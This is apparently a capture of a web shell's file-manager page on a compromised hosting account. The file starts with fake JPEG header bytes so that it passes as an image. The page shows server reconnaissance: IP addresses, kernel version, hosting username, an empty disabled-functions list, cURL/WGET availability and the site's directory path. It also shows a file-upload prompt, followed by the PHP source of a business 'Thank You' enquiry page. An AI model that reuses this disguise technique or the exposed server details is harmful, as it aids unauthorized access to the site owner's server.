���� JFIF fdasasfas213sdaf
Server IP : 147.79.69.163 / Your IP : 216.73.216.200 Web Server : LiteSpeed System : Linux in-mum-web669.main-hosting.eu 5.14.0-503.23.2.el9_5.x86_64 #1 SMP PREEMPT_DYNAMIC Wed Feb 12 05:52:18 EST 2025 x86_64 User : u479334040 ( 479334040) PHP Version : 8.2.27 Disable Function : NONE MySQL : OFF | cURL : ON | WGET : ON | Perl : OFF | Python : OFF | Sudo : OFF | Pkexec : OFF Directory : /home/u479334040/domains/geozincoxide.com/public_html/ |
Upload File : |
<!DOCTYPE html> <html lang="en"> <head> <meta charset="utf-8"> <title></title> <meta content="width=device-width, initial-scale=1.0" name="viewport"> <meta content="" name="description"> <meta content="" name="keywords"> <link href="img/favicon.ico" rel="icon"> <?php include 'assets.php'?> </head> <?php include'header.php';?> <!-- Hero Start --> <div class="container-fluid bg-primary py-5 hero-header mb-5"> <div class="row pt-5 "> <div class="col-12 text-center"> <h1 class="display-6 text-white animated zoomIn">Thank You </h1> <a href="" class="h5 text-white">Home</a> <i class="far fa-circle text-white px-2"></i> <a href="" class="h5 text-white">Thank You</a> </div> </div> </div> <!-- About Start --> <section class="thank-you"> <h1>Thank You!</h1> <p>Your Enquiry has been submitted successfully. </p> </section> <style> .thank-you{padding: 40px 0; text-align: center;} .thank-you h1{font-size: 60px; color:#074764;} .thank-you p{font-size: 20px; font-weight: 700;} </style> <!-- About End --> <?php include 'footer.php';?>